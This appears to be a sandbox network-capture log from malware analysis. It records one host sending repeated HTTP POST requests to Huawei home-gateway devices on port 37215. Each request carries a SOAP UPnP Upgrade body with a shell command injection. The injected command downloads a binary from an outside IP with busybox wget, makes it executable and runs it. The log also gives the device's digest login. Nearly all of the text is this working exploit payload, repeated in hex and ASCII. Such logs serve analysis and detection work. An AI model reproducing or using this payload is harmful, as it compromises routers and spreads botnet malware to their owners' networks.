                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              954192.168.2.154106894.115.208.2137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540105104 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              955192.168.2.1549474190.240.22.437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540112019 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              956192.168.2.1546108142.45.138.15037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540143967 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              957192.168.2.1542512186.191.19.17537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540144920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              958192.168.2.154694679.145.118.19337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540169001 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              959192.168.2.1555584222.213.18.14437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540170908 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              960192.168.2.154111294.206.225.17037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540186882 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              961192.168.2.154770637.219.146.22337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540225029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              962192.168.2.1546890121.238.222.23837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540226936 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              963192.168.2.154015431.43.176.12937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540252924 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
